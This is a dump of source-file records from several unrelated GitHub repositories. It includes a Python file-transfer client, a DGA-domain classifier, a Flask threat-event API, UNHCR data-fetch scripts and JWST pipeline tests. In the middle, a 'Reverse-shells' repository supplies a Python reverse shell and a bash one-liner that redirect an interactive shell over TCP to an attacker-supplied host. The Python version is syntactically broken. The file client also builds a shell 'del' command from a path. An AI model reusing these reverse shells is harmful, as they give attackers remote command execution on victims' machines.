self.username.decode().strip('\\x00')\n self.pwd = self.pwd.decode().strip('\\x00')\n self.action = self.action.decode().strip('\\x00')\n self.md5sum = self.md5sum.decode().strip('\\x00')\n self.clientfilePath = self.clientfilePath.decode().strip('\\x00')\n self.serverfilePath = self.serverfilePath.decode().strip('\\x00')\n \n def CheckUsers(self,name,pwd):\n self.ClientLink()\n \n self.username = name\n self.pwd = pwd\n ret = self.struct_pack()\n self.s.send(ret)\n recv = self.s.recv(1024)\n if recv.decode() == '0':\n print(\"id or pwd error!\")\n return 0\n else:\n filelist = self.s.recv(1024).decode().split(\",\")\n print(filelist)\n return 1\n\n\n def GetMD5(self,filepath):\n fd = open(filepath,\"r\")\n fcont = fd.readlines()\n fd.close()\n fmd5 = hashlib.md5(str(fcont).encode(\"utf-8\"))\n return fmd5.hexdigest() \n \n def ClientLink(self):\n purpose = ssl.Purpose.SERVER_AUTH\n self.context = ssl.create_default_context(purpose, cafile=self.cafile)\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n host = InitHost()\n server_port = 9999\n self.sock.connect((host, server_port))\n self.s = self.context.wrap_socket(self.sock, server_hostname=self.host)\n\n def SendFile(self,clientfilePath,serverfilePath):\n if not os.path.exists(clientfilePath):\n print('源文件/文件夹不存在')\n return \"No such file or directory\"\n self.action = 'upload'\n self.md5sum = self.GetMD5(clientfilePath)\n self.size = os.stat(clientfilePath).st_size\n self.serverfilePath = os.path.basename(serverfilePath)\n self.clientfilePath = os.path.basename(clientfilePath)\n ret = self.struct_pack()\n\n \n try:\n #self.ClientLink()\n s = self.s\n s.send(ret)\n recv = s.recv(1024)\n if recv.decode() == 'dirNotExist':\n print(\"目标文件/文件夹不存在\")\n return \"No such file or directory\"\n elif recv.decode() == 'ok':\n fo = open(clientfilePath, 'rb')\n while True:\n filedata = fo.read(1024)\n if not filedata:\n break\n s.send(filedata)\n fo.close()\n recv = s.recv(1024)\n if recv.decode() == 'ok':\n print(\"文件传输成功\")\n s.close()\n return 0\n else:\n s.close()\n return \"md5sum error:md5sum is not correct!\"\n except Exception as e:\n print(e)\n\n def RecvFile(self,clientfilePath,serverfilePath):\n if not os.path.isdir(serverfilePath):\n filePath,fileName = os.path.split(serverfilePath)\n else:\n filePath = serverfilePath\n if not os.path.exists(clientfilePath):\n print('本地目标文件/文件夹不存在')\n return \"No such file or directory\"\n self.action = 'download'\n self.serverfilePath = serverfilePath\n self.clientfilePath = clientfilePath\n ret = self.struct_pack()\n \n try:\n s = self.s\n s.send(ret)\n recv = s.recv(struct.calcsize(self.dataFormat))\n self.struct_unpack(recv)\n if self.action.startswith(\"ok\"):\n if os.path.isdir(clientfilePath):\n fileName = (os.path.split(serverfilePath))[1]\n clientfile = os.path.join(clientfilePath, fileName)\n self.recvd_size = 0\n file = open(clientfile, 'wb')\n while not self.recvd_size == self.size:\n if self.size - self.recvd_size > 1024:\n rdata = s.recv(1024)\n self.recvd_size += len(rdata)\n else:\n rdata = s.recv(self.size - self.recvd_size)\n self.recvd_size = self.size\n file.write(rdata)\n file.close()\n print('\\n等待校验...')\n output = self.GetMD5(clientfile)\n if output == self.md5sum:\n print(\"文件传输成功\")\n else:\n print(\"文件校验不通过\")\n (status, output) = subprocess.getstatusoutput(\"del \" + clientfilePath)\n elif self.action.startswith(\"nofile\"):\n print('远程源文件/文件夹不存在')\n return \"No such file or directory\"\n except Exception as e:\n print(e)\n\n\n\n\n \n \n\nif __name__ == '__main__':\n fileclient = FileClient()\n fileclient.CheckUsers(\"1\",\"123456\")\n #fileclient.SendFile('./client_data/test.txt','./server_data')\n fileclient.RecvFile('./client_data/','./server_data/test2.txt')\n" }, { "alpha_fraction": 0.5567164421081543, "alphanum_fraction": 0.625373125076294, "avg_line_length": 30.13953399658203, "blob_id": "8c0a0477c46ba09e7751ca0dfe72dce20946b762", "content_id": "85e581e72d96790e7b683086843fc33f5a845683", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1410, "license_type": "permissive", "max_line_length": 265, "num_lines": 43, "path": "/AIE/keras/model_prediction.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "import tldextract\nimport numpy as np\nimport time\nimport sklearn\nfrom keras.models import load_model\nfrom sklearn.cross_validation import train_test_split\n\ndef pad(dat, length=31, item=0):\n if len(dat)>length:\n dat=dat[:length]\n else:\n dat.extend((length-len(dat))*[item])\n return dat\n\ndef domain2list(domain):\n diction = {'a':1,'b':2,'c':3,'d':4,'e':5,'f':6,'g':7,'h':8,'i':9,'j':10,'k':11,'l':12,'m':13,'n':14,'o':15,'p':16,'q':17,'r':18,'s':19,'t':20,'u':21,'v':22,'w':23,'x':24,'y':25,'z':26,'0':27,'1':28,'2':29,'3':30,'4':31,'5':32,'6':33,'7':34,'8':35,'9':36,'-':37}\n data=[diction.get(x,38) for x in domain]\n return pad(data)\n\ndef makeData(black=\"./data/dga.txt\"):\n X = []\n no_fetch_extract = tldextract.TLDExtract(suffix_list_urls=None)\n with open(black,'r') as f:\n data=f.readlines()\n for i in data:\n X.append(domain2list(no_fetch_extract(i.strip()).domain))\n X=np.mat(X)\n return X\n\n# 获取模型\nmodel = load_model(\"cnn-2121.h5\")\n# 输入测试集数据\ndata = makeData()\n# 开始预测\n# steps : 生成器返回数据的轮数,输出是恶意域名的概率\ntrain_data, test_data = train_test_split(data,test_size=0.1)\nstarts=time.time()\nmodel.predict(test_data,steps=1)\ntimecost=time.time()-starts\nprint(test_data.shape)\nprint(test_data.shape[0],\"items\")\nprint(timecost,\"seconds\")\nprint(test_data.shape[0]/timecost,\"-eps\")\n\n" }, { "alpha_fraction": 0.4869041442871094, "alphanum_fraction": 0.5309062600135803, "avg_line_length": 23.619354248046875, "blob_id": "764d6efc8de8fe1ec001104baf28aeaebe6aed89", "content_id": "9e58873e88dcbed869a08217f37d8642a9ea8c2d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 4120, "license_type": "permissive", "max_line_length": 94, "num_lines": 155, "path": "/个人主页2_files/tool.js", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "function work_space(obj) //验证是否有空格\n{\n var pattern = /\\s/;\n if (pattern.test(obj))\n return true;\n else\n return false;\n}\n\nfunction work_isNumber(obj) //验证浮点类型\n{\n var pattern = /(^[0-9]$)|(^[1-9]([0-9]*)$)|(^[0-9].([0-9]+)$)|(^[1-9]([0-9]*).([0-9]+)$)/;\n if (pattern.test(obj))\n return true;\n else\n return false;\n}\n\nfunction work_isInteger(obj) //验证整数类型\n{ \n var pattern = /(^[0-9]$)|(^[1-9]([0-9]*)$)/;\n if (pattern.test(obj))\n return true;\n else\n return false;\n}\n\nfunction work_isDate(obj) //验整日期类型(目前只能判断格式,内容需要再扩展)\n{\n var pattern = /^([12]\\d\\d\\d)-((0[1-9])|(1[12]))-((0[1-9])|(1[0-9])|(2[0-9])|(3[01]))$/;\n if (pattern.test(obj))\n return true;\n else\n return false;\n}\n\nfunction work_select(slt, opt) //下拉列表选项定位\n{\n for (var i = 0; i < slt.length; i++){\n \n if (slt.options[i].value == opt)\n slt.options[i].selected = true;\n }\n}\nfunction work_select2(slt, opt) //单选项定位\n{\n\t\n for (var i = 0; i < slt.length; i++){\n \tif (slt[i].value == opt){\n slt[i].checked = true;\n }\n \n }\n}\n\nfunction work_calendar() //获取当前日历\n{\n calendar = new Date();\n day = calendar.getDay();\n month = calendar.getMonth();\n date = calendar.getDate();\n year = calendar.getYear();\n \n if (year < 100) \n year = 1900 + year;\n \n cent = parseInt(year/100);\n g = year % 19;\n k = parseInt((cent - 17)/25);\n i = (cent - parseInt(cent/4) - parseInt((cent - k)/3) + 19*g + 15) % 30;\n i = i - parseInt(i/28)*(1 - parseInt(i/28)*parseInt(29/(i+1))*parseInt((21-g)/11));\n j = (year + parseInt(year/4) + i + 2 - cent + parseInt(cent/4)) % 7;\n l = i - j;\n emonth = 3 + parseInt((l + 40)/44);\n edate = l + 28 - 31*parseInt((emonth/4));\n emonth--;\n \n var dayname = new Array (\" 星期日\", \" 星期一\", \" 星期二\", \" 星期三\", \" 星期四\", \" 星期五\", \" 星期六\");\n var monthname = new Array (\"1月\",\"2月\",\"3月\",\"4月\",\"5月\",\"6月\",\"7月\",\"8月\",\"9月\",\"10月\",\"11月\",\"12月\" );\n document.write(\"<font color=#FFFFFF>\"+year +\"年\");\n document.write(monthname[month]);\n document.write(date + \"日\");\n document.write(dayname[day]+\" \");\n \n if ((month == 0) && (date == 1)) document.write(\"元旦\");\n if ((month == 4) && (date == 1)) document.write(\"国际劳动节\");\n if ((month == 4) && (date == 4)) document.write(\"青年节\");\n if ((month == 5) && (date == 1)) document.write(\"国际儿童节\");\n if ((month == 11) && (date == 25)) document.write(\"圣诞节\"); \n if ((month == 1) && (date == 14)) document.write(\"情人节\");\n if ((month == 2) && (date == 8)) document.write(\"妇女节\");\n if ((month == 2) && (date == 9)) document.write(\"教师节\");\n if ((month == 3) && (date == 1)) document.write(\"愚人节\");\n if ((month == 6) && (date == 1)) document.write(\"党的生日\");\n if ((month == 7) && (date == 1)) document.write(\"建军节\");\n if ((month == 9) && (date == 1)) document.write(\"国庆节\");\n \n document.write(\"</font>\");\n}\n\nfunction work_StringToUnicode(obj)\n{\n var s = '';\n for (var i = 0; i < obj.length; i++)\n s = s + obj.charCodeAt(i) + ';';\n \n return s;\n}\n\nfunction work_UnicodeToString(obj)\n{\n var code = obj.split(\";\");\n\n var s = '';\n for (var i = 0; i < code.length; i++)\n s = s + String.fromCharCode(code[i]);\n \n return s;\n}\n\nfunction work_trim(obj) //去除字符串两边空格\n{\n return obj.replace(/(^\\s*)|(\\s*$)/g, \"\");\n}\n\nfunction work_datetime() //当前日期时间\n{\n var now = new Date();\n var year = now.getYear();\n var month = now.getMonth() + 1;\n var date = now.getDate();\n var hour = now.getHours();\n var minute = now.getMinutes();\n \n var second = now.getTime() % 60000;\n second = (second - (second % 1000)) / 1000;\n \n if (month < 10)\n month = \"0\" + month;\n \n if (date < 10)\n date = \"0\" + date;\n \n if (hour < 10)\n hour = \"0\" + hour;\n \n if (minute < 10)\n minute = \"0\" + minute;\n\n if (second < 10)\n second = \"0\" + second;\n\n var clock = year + \"-\" + month + \"-\" + date + \" \" + hour + \":\" + minute + \":\" + second;\n return(clock);\n} \n" }, { "alpha_fraction": 0.559899091720581, "alphanum_fraction": 0.5709331631660461, "avg_line_length": 29.209524154663086, "blob_id": "4b37bda282a05dd4c21723d7814b3bc46e118004", "content_id": "3e0969ac33ad33581ac33f18787248849e95c838", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3172, "license_type": "permissive", "max_line_length": 137, "num_lines": 105, "path": "/search/apps/restful/algorithm_mgmt.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "from flask import *\nfrom service import data_show as ads\nimport json\nfrom apps.restful import api\n\[email protected]('/aievisualize/rest/threatevent/threat_event_list_data')\ndef get_all_output_data():\n try: \n current_page = int(request.args.get('current_page')) if request.args.get('current_page') else 1\n page_size = int(request.args.get('pageSize')) if request.args.get('pageSize') else 20\n except:\n items = []\n total = 0\n resultCode = '5'\n else:\n items, total, resultCode = ads.get_all_result(current_page,page_size)\n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n \"data\":items\n }\n try:\n json_data = json.dumps(rstJson)\n except:\n items = []\n total = 0\n resultCode = '5'\n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n \"data\":items\n }\n json_data = json.dumps(rstJson)\n return json_data\n\[email protected]('/aievisualize/rest/threatevent/threat_event_detect_list_data')\ndef get_detect_output_data():\n try:\n threat_type = str(request.args.get('ThreatType')).encode('utf-8') if request. args.get('ThreatType') else '40000'.encode(\"utf-8\")\n current_page = int(request.args.get('current_page')) if request.args.get('current_page') else 1\n page_size = int(request.args.get('pageSize')) if request.args.get('pageSize') else 20\n beginTime = int(request.args.get('beginTime')) if request.args.get('beginTime') else 0\n endTime = int(request.args.get('endTime')) if request.args.get('endTime') else 1538212486\n except:\n items = []\n total = 0\n resultCode = '5'\n else:\n items, total, resultCode = ads.get_detect_result(threat_type,current_page,page_size,beginTime,endTime)\n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n \"data\":items\n }\n try:\n json_data = json.dumps(rstJson)\n except:\n items = []\n total = 0\n resultCode = '5'\n rstJson = {\n \"resultCode\":resultCode,\n \"errDesc\":\"\",\n \"totalCount\":total,\n \"data\":items\n }\n json_data = json.dumps(rstJson)\n return json_data\n\[email protected](\"/aievisualize/rest/threatevent/threat_event_agg_data\")\ndef get_algorithms_num():\n errDesc = \"OK\"\n resultCode = \"0\"\n aggField = str(request.args.get(\"aggField\"))\n try:\n if aggField == \"ThreatType\":\n agg_terms = ads.get_algorithms_type_num()\n elif aggField == \"ThreatLevel\":\n agg_terms = ads.get_algorithms_level_num()\n else:\n resultCode = \"1\"\n errDesc = \"Fail\"\n agg_terms = []\n except Exception:\n resultCode = \"4\"\n errDesc = \"Fail\"\n agg_terms = []\n data = [\n {\n \"key\" : \"\",\n \"doc_count\" : len(agg_terms),\n \"agg_terms\" : agg_terms,\n }\n ]\n rstJson = {\n \"resultCode\" : resultCode,\n \"errDesc\" : errDesc,\n \"totalCount\" : len(data),\n \"data\" : data\n }\n json_data = json.dumps(rstJson)\n return json_data\n" }, { "alpha_fraction": 0.7570093274116516, "alphanum_fraction": 0.7570093274116516, "avg_line_length": 20.399999618530273, "blob_id": "ace975421dd8a614a41d5e8df29ec393edf0a8bf", "content_id": "46c7cb7a9860b9d099cca2401ea6fc0160a3c54e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 107, "license_type": "permissive", "max_line_length": 39, "num_lines": 5, "path": "/search/apps/restful/__init__.py", "repo_name": "1flurry/Xiaoyu.github.io", "src_encoding": "UTF-8", "text": "from flask import Blueprint\n\napi = Blueprint('restful', __name__)\n\nfrom apps.restful import algorithm_mgmt\n" } ]
17
pablitoarango/ColombiaRefugeeVisualization
https://github.com/pablitoarango/ColombiaRefugeeVisualization
91318d4a7c3662d554815daf5db480228b90bc6c
fac0ac50ca56add5fdcbeacff222e2fcaa241c3d
1d58b4dedc1df19ea55195a4a4b87236dfd14804
refs/heads/master
2022-05-03T06:52:26.731828
2014-11-16T06:22:26
2014-11-16T06:22:26
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48275861144065857, "alphanum_fraction": 0.48275861144065857, "avg_line_length": 28, "blob_id": "2e89673aef575a3f813471ec13f012a64afc6f40", "content_id": "370a3bdb0902888f0b89466fc8cf5c284eb21e47", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 58, "license_type": "no_license", "max_line_length": 28, "num_lines": 2, "path": "/README.md", "repo_name": "pablitoarango/ColombiaRefugeeVisualization", "src_encoding": "UTF-8", "text": "ColombiaRefugeeVisualization\n============================\n" }, { "alpha_fraction": 0.650943398475647, "alphanum_fraction": 0.6643081903457642, "avg_line_length": 31.487178802490234, "blob_id": "8534424cb3bf412a6823fd9f52f31038674bb34d", "content_id": "42f2e20a178327b41af7f8a3a5a928d2184e45a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1272, "license_type": "no_license", "max_line_length": 121, "num_lines": 39, "path": "/alldata.py", "repo_name": "pablitoarango/ColombiaRefugeeVisualization", "src_encoding": "UTF-8", "text": "\nimport urllib2\nimport json\n\n\nEverything = {}\nresponse = urllib2.urlopen('http://data.unhcr.org/api/stats/country_of_residence.json')\ndata = json.load(response)\nfor country in data:\n\tcode = country['country_of_residence']\n\tresponse = urllib2.urlopen('http://data.unhcr.org/api/stats/persons_of_concern.json?year=2013&country_of_origin='+ code)\n\tdata = json.load(response)\n\tinfo = {}\n\tinfo[\"year\"] = 2013\n\tinfo[\"total_population\"] =0\n\tinfo[\"refugees\"] =0\n\tinfo[\"returned_refugees\"] = 0\n\tinfo[\"idps\"] = 0\n\tinfo[\"asylum_seekers\"] = 0\n\n\tfor i in range (len(data)):\n\t\tif data[i][\"total_population\"] is not None and data[i][\"total_population\"]!='*':\n\t\t\tinfo[\"total_population\"] += int(data[i][\"total_population\"])\n\t\tif data[i][\"refugees\"] is not None:\n\t\t\tinfo[\"refugees\"] += int(data[i][\"refugees\"])\n\t\tif data[i][\"returned_refugees\"] is not None:\n\t\t\tinfo[\"returned_refugees\"] += int(data[i][\"returned_refugees\"])\n\t\tif data[i][\"idps\"] is not None:\n\t\t\tinfo[\"idps\"] += int(data[i][\"idps\"])\n\t\tif data[i][\"asylum_seekers\"] is not None:\n\t\t\tinfo[\"asylum_seekers\"] += int(data[i][\"asylum_seekers\"])\n\tEverything[code]= info\n\tprint code\n\njsondata=json.dumps(Everything.values(), indent=4, separators=(',', ': '))\n\n\nf = open('countries_data.json', 'w')\nprint >> f, jsondata\nf.close()\n\n\n\n\n" }, { "alpha_fraction": 0.6329004168510437, "alphanum_fraction": 0.6476190686225891, "avg_line_length": 27.073171615600586, "blob_id": "8baccce559554c03bede3142cf6fab7fa74327d9", "content_id": "06389351d3211426fe83f63687c343149ecc4f4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1155, "license_type": "no_license", "max_line_length": 127, "num_lines": 41, "path": "/data.py", "repo_name": "pablitoarango/ColombiaRefugeeVisualization", "src_encoding": "UTF-8", "text": "import urllib2\nimport json\n\n\n\nyears = {}\n\nyear=2000\nwhile year != 2014:\n\tresponse = urllib2.urlopen('http://data.unhcr.org/api/stats/persons_of_concern.json?year='+str(year)+'&country_of_origin=COL')\n\tdata = json.load(response)\n\tinfo = {}\n\tinfo[\"year\"] = year\n\tinfo[\"total_population\"] =0\n\tinfo[\"refugees\"] =0\n\tinfo[\"returned_refugees\"] = 0\n\tinfo[\"idps\"] = 0\n\tinfo[\"asylum_seekers\"] = 0\n\t\n\tfor i in range (len(data)):\n\t\tif data[i][\"total_population\"] is not None and data[i][\"total_population\"]!='*':\n\t\t\tinfo[\"total_population\"] += int(data[i][\"total_population\"])\n\t\tif data[i][\"refugees\"] is not None:\n\t\t\tinfo[\"refugees\"] += int(data[i][\"refugees\"])\n\t\tif data[i][\"returned_refugees\"] is not None:\n\t\t\tinfo[\"returned_refugees\"] += int(data[i][\"returned_refugees\"])\n\t\tif data[i][\"idps\"] is not None:\n\t\t\tinfo[\"idps\"] += int(data[i][\"idps\"])\n\t\tif data[i][\"asylum_seekers\"] is not None:\n\t\t\tinfo[\"asylum_seekers\"] += int(data[i][\"asylum_seekers\"])\n\tyears[year]= info\n\tprint info\n\tprint year\n\tyear+=1\nprint years\njsondata=json.dumps(years.values(), indent=4, separators=(',', ': '))\nprint jsondata\n\nf = open('data.json', 'w')\nprint >> f, jsondata\nf.close()\n\n\n\n\n" } ]
3
talamiri/Reverse-shells
https://github.com/talamiri/Reverse-shells
2fb0e4598c7855dadf000b3915a9c34c06586941
2ae1e4734247ee9f351be6111bccc3d8f9e05c66
192333e72797a7318298241c3b5491470a1ac5ea
refs/heads/main
2023-05-24T14:33:34.092977
2021-06-25T18:30:16
2021-06-25T18:30:16
380,322,365
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.631205677986145, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 20.69230842590332, "blob_id": "8d9fe873c847ccdfd0a09e3fd9649fcc23e73eea", "content_id": "47a2635c92fa059e1c312b52e9c739e6394fff89", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 282, "license_type": "no_license", "max_line_length": 53, "num_lines": 13, "path": "/Reverse.py", "repo_name": "talamiri/Reverse-shells", "src_encoding": "UTF-8", "text": "import socket\nimport subprocess\nimport os\n\nlhost = \"Enter Attackers IP\"\nlport = 4444\n\n s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) \n s.connect((\"lhost,lport))\n os.dup2(s.fileno(),0) \n os.dup2(s.fileno(),1) \n os.dup2(s.fileno(),2)\n p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n" }, { "alpha_fraction": 0.5849056839942932, "alphanum_fraction": 0.6226415038108826, "avg_line_length": 52, "blob_id": "a9d0581942065bd8229c1f7c53bd560acaac7b42", "content_id": "5b687b21dd51143fc60dbb2c8c457f0407f6fcd3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 53, "license_type": "no_license", "max_line_length": 52, "num_lines": 1, "path": "/Reverse.sh", "repo_name": "talamiri/Reverse-shells", "src_encoding": "UTF-8", "text": "bash -c 'bash -i >& /dev/tcp/attackers-ip/port 0>&1'\n" } ]
2
mperrin/jwst
https://github.com/mperrin/jwst
59bff92d15e099e2e67d57df848a83af04743c61
e3a5b2d8bb50d92ccca46cd3bbd6585d5238000a
4c38570d4e53aae508ce90595d885ab0f26aaf7a
refs/heads/master
2022-12-02T17:17:49.075691
2020-08-17T15:16:40
2020-08-17T15:16:40
288,289,926
0
0
NOASSERTION
2020-08-17T21:27:35
2020-08-17T15:16:44
2020-08-17T20:39:39
null
[ { "alpha_fraction": 0.5203045606613159, "alphanum_fraction": 0.6086755990982056, "avg_line_length": 33.95161437988281, "blob_id": "19d23181e11e32f9db5c7d65eb5a8c8205fc4d86", "content_id": "2ec7d2aa35387227f3626f70948cb239ae0795dd", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4334, "license_type": "permissive", "max_line_length": 87, "num_lines": 124, "path": "/jwst/tests_nightly/general/miri/test_sloperpipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "from glob import glob\nimport os\n\nimport pytest\n\nfrom jwst.pipeline import Detector1Pipeline\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\nclass TestMIRISloperPipeline(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_sloperpipeline','truth']\n test_dir = 'test_sloperpipeline'\n\n def test_gain_scale_naming(self):\n \"\"\"\n Regression test for gain_scale naming when results are requested to\n be saved for the gain_scale step.\n \"\"\"\n expfile = 'jw00001001001_01101_00001_MIRIMAGE'\n input_file = self.get_data(self.test_dir, expfile+'_uncal.fits')\n input_name = os.path.basename(input_file)\n\n step = Detector1Pipeline()\n step.group_scale.skip = True\n step.dq_init.skip = True\n step.saturation.skip = True\n step.ipc.skip = True\n step.superbias.skip = True\n step.refpix.skip = True\n step.rscd.skip = True\n step.firstframe.skip = True\n step.lastframe.skip = True\n step.linearity.skip = True\n step.dark_current.skip = True\n step.persistence.skip = True\n step.jump.skip = True\n step.ramp_fit.skip = False\n\n step.gain_scale.skip = False\n step.gain_scale.save_results = True\n\n step.run(input_file)\n\n\n files = glob('*.fits')\n\n if input_name in files:\n files.remove(input_name)\n\n output_file = expfile + '_gain_scale.fits'\n assert output_file in files\n files.remove(output_file)\n\n output_file = expfile + '_gain_scaleints.fits'\n assert output_file in files\n files.remove(output_file)\n\n assert not len(files)\n\n def test_detector1pipeline1(self):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on MIRI data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00001001001_01101_00001_MIRIMAGE_uncal.fits')\n\n step = Detector1Pipeline()\n step.save_calibrated_ramp = True\n step.ipc.skip = True\n step.refpix.odd_even_columns = True\n step.refpix.use_side_ref_pixels = True\n step.refpix.side_smoothing_length=11\n step.refpix.side_gain=1.0\n step.refpix.odd_even_rows = True\n step.persistence.skip = True\n step.jump.rejection_threshold = 250.0\n step.ramp_fit.save_opt = False\n step.output_file='jw00001001001_01101_00001_MIRIMAGE'\n step.suffix='rate'\n\n step.run(input_file)\n\n outputs = [('jw00001001001_01101_00001_MIRIMAGE_ramp.fits',\n 'jw00001001001_01101_00001_MIRIMAGE_uncal_jump.fits'),\n ('jw00001001001_01101_00001_MIRIMAGE_rateints.fits',\n 'jw00001001001_01101_00001_MIRIMAGE_uncal_integ.fits'),\n ('jw00001001001_01101_00001_MIRIMAGE_rate.fits',\n 'jw00001001001_01101_00001_MIRIMAGE_uncal_MiriSloperPipeline.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_detector1pipeline2(self):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on MIRI data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw80600012001_02101_00003_mirimage_uncal.fits')\n\n step = Detector1Pipeline()\n step.save_calibrated_ramp = True\n step.ipc.skip = True\n step.refpix.odd_even_columns = True\n step.refpix.use_side_ref_pixels = True\n step.refpix.side_smoothing_length=11\n step.refpix.side_gain=1.0\n step.refpix.odd_even_rows = True\n step.persistence.skip = True\n step.jump.rejection_threshold = 250.0\n step.ramp_fit.save_opt = False\n step.output_file='jw80600012001_02101_00003_mirimage'\n step.suffix='rate'\n\n step.run(input_file)\n\n outputs = [('jw80600012001_02101_00003_mirimage_ramp.fits',\n 'jw80600012001_02101_00003_mirimage_ramp.fits'),\n ('jw80600012001_02101_00003_mirimage_rateints.fits',\n 'jw80600012001_02101_00003_mirimage_rateints.fits'),\n ('jw80600012001_02101_00003_mirimage_rate.fits',\n 'jw80600012001_02101_00003_mirimage_rate.fits')\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.583419680595398, "alphanum_fraction": 0.5927461385726929, "avg_line_length": 30.129032135009766, "blob_id": "0e453e9767055ef8f80cffb3dce954553b92dbba", "content_id": "04f7a054d2293def128ddeb7c0e7943ab4530818", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 965, "license_type": "permissive", "max_line_length": 90, "num_lines": 31, "path": "/jwst/lib/exposure_types.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nThis module contains lists of modes grouped in different ways\n\"\"\"\nfrom ..associations.lib.dms_base import (ACQ_EXP_TYPES, IMAGE2_SCIENCE_EXP_TYPES,\n IMAGE2_NONSCIENCE_EXP_TYPES,\n SPEC2_SCIENCE_EXP_TYPES)\n\nIMAGING_TYPES = set(tuple(ACQ_EXP_TYPES) + tuple(IMAGE2_SCIENCE_EXP_TYPES)\n + tuple(IMAGE2_NONSCIENCE_EXP_TYPES) +\n ('fgs_image', 'fgs_focus'))\n\nSPEC_TYPES = SPEC2_SCIENCE_EXP_TYPES\n\n# FGS guide star exposures\nFGS_GUIDE_EXP_TYPES = [\n 'fgs_acq1',\n 'fgs_acq2',\n 'fgs_fineguide',\n 'fgs_id-image',\n 'fgs_id-stack',\n 'fgs_track',\n]\n\n\ndef is_moving_target(input_models):\n \"\"\" Determine if a moving target exposure.\"\"\"\n model = input_models[0]\n if hasattr(model.meta.target, 'type') and \\\n model.meta.target.type is not None and model.meta.target.type.lower() == 'moving':\n return True\n return False\n" }, { "alpha_fraction": 0.6428065299987793, "alphanum_fraction": 0.6619418859481812, "avg_line_length": 24.196428298950195, "blob_id": "be0754a054ab31076fcbe9c845b6371f002e620b", "content_id": "568c2c3ff6548db3a809b1bdd44c2e5f6c62be8a", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1411, "license_type": "permissive", "max_line_length": 77, "num_lines": 56, "path": "/jwst/outlier_detection/tests/test_outlier_detection.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nimport numpy as np\nfrom scipy.ndimage.filters import gaussian_filter\n\nfrom jwst.outlier_detection.outlier_detection import flag_cr\nfrom jwst import datamodels\n\n\[email protected]\ndef sci_blot_image_pair():\n \"\"\"Provide a science and blotted ImageModel pair.\"\"\"\n shape = (10, 10)\n sci = datamodels.ImageModel(shape)\n\n # Populate keywords\n sci.meta.exposure.exposure_time = 1\n\n # Add poisson noise to image data\n p = np.random.poisson(size=shape, lam=1e3)\n sci.data = p / p.mean() - 1\n\n # The blot image is just a smoothed version of the science image\n blot = sci.copy()\n blot.data = gaussian_filter(blot.data, sigma=3)\n\n return sci, blot\n\n\ndef test_flag_cr(sci_blot_image_pair):\n \"\"\"Test the flag_cr function. Test logic, not the actual noise model.\"\"\"\n sci, blot = sci_blot_image_pair\n assert (sci.dq == 0).all()\n\n # Add some background\n sci.data += 3\n blot.data += 3\n\n # Drop a CR on the science array\n sci.data[5, 5] += 10\n\n flag_cr(sci, blot)\n assert sci.dq[5, 5] > 0\n\n\ndef test_flag_cr_with_subtracted_background(sci_blot_image_pair):\n \"\"\"Test the flag_cr function on background-subtracted data\"\"\"\n sci, blot = sci_blot_image_pair\n\n sci.meta.background.subtracted = True\n sci.meta.background.level = 3\n\n # Drop a CR on the science array\n sci.data[5, 5] += 10\n\n flag_cr(sci, blot)\n assert sci.dq[5, 5] > 0\n" }, { "alpha_fraction": 0.5407925248146057, "alphanum_fraction": 0.5530303120613098, "avg_line_length": 22.189189910888672, "blob_id": "ba0ec338213b740253a22a93c3868fba10810a88", "content_id": "b2f1af875d1c14c0954165769112ef20fed1e124", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1716, "license_type": "permissive", "max_line_length": 76, "num_lines": 74, "path": "/jwst/tests_nightly/general/associations/test_level3_product_names.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nimport re\n\nfrom jwst.associations.tests.helpers import (\n func_fixture,\n generate_params,\n registry_level3_only,\n t_path,\n)\n\nfrom jwst.associations import (AssociationPool, generate)\nfrom jwst.associations.lib.dms_base import 